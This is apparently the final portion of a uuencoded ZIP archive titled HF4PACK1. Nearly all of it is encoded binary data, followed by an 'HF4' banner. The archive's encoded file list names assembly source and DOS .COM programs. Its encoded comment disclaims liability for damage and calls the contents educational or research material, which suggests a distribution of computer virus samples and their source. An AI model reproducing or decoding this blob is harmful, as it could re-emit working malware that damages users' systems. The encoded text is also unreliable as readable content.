MI*"F@8L\?^7"Y>/`^S_M[PM,"JZC?W%][/)/"ZY+DT%A3``RB077Y=FKKJE0
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
M,G"6`']US-G-8IK(.1P<FY+!SC1)5QOH_A'1,0?@&+X_6@7I)-&@9;[W=U`Q
MX8N</YXV=MV1PF8>`_D=@.@$@%UL4T5Z5HE,4\=$^1T0W@]%30CO9^.JOCF3
M[[*XQN66OG'Y-]K\CD1@Y5_A;EA/TH3U[)M$@3<+%(U-JL:ULIYQ^;B\70[V
M7NV6@_-QA`RN&,"M!+W%O/=FI,A!H-6P/G'LU/A:JVM\S=LCXVN^T2:+Q[66
ME/3":%V7'.Q)KEL%F)`F8]=YD:)N51;SN0N_#[V\-!5(MR3MO8K_A]!?T/_#
M^_:_`%!+`0(4`!0``@`(`$5Q125P\0JDL!P``'2/```,``````````$`(```
M``````!*,3)35$0M02Y!4TU02P$"%``4``(`"`!!<44E:[IZ7Z$7``#\=0``
M#``````````!`"````#:'```2C$R4U1$+4(N05--4$L!`A0`%``"``@`SW%%
M):K?50#C&0``$'X```P``````````0`@````I30``$HQ,E-00U!$+D%335!+
M`0(4`!0``@`(`')R126+XCMW%`D``%0,```,````````````(````+).``!*
M,3)35$0M02Y#3TU02P$"%``4``(`"`!]<D4E*Y<>&24)``!W#```#```````
M`````"````#P5P``2C$R4U1$+4(N0T]-4$L!`A0`%``"``@`A7)%)92@)ELA
M"0``5`P```P````````````@````/V$``$HQ,E-00U!$+D-/35!+!08`````
M!@`&`%P!``"*:@``Y0$-"@T*("`@2$58+49)3$53(&%N9"!0=71O:W-A($MA
M=V%Y86X@87)E(&YO="!R97-P;VYS:6)L92!F;W(@86-T=6%L+"`-"B`@(&EM
M<&QI960@86YD+V]R(&EM86=I;F%R>2!D86UA9V4@87)I<VEN9R!D:7)E8W1L
M>2!O<B!I;F1I<F5C=&QY(`T*("`@9G)O;2!T:&4@=7-E+"!M:7-U<V4@;W(@
M;F]N+75S92!O9B!T:&4@8V]N=&5N="]S(&]F('1H:7,@87)C:&EV92X-"B`@
M(%1H92!P97)S;VX@=VAO(&5X=')A8W1S('1H92!C;VYT96YT+W,@;V8@=&AI
M<R!A<F-H:79E+"!O<B!A;GD-"B`@('!E<G-O;B!W:&\@=7-E<R!P<F]G<F%M
M+W,@9&5R:79E9"!F<F]M('1H:7,@87)C:&EV92P@8F5A<G,@9G5L;`T*("`@
M<F5S<&]N<VEB:6QI='D@9F]R(&%L;"!O9B!H:7,O:&5R(&%C=&EO;G,N#0H-
M"B`@(%1H92!C;VYT96YT+W,@;V8@=&AI<R!A<F-H:79E(&ES('-T<FEC=&QY
M(&9O<B!E9'5C871I;VYA;"!O<@T*("`@<F5S96%R8V@@<'5R<&]S97,@;VYL
$>2X-"@``
`
end

 ÄÄ HF4PACK1.UUE ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 

 
                                   
                               -=<{[* HF4 *]}>=-
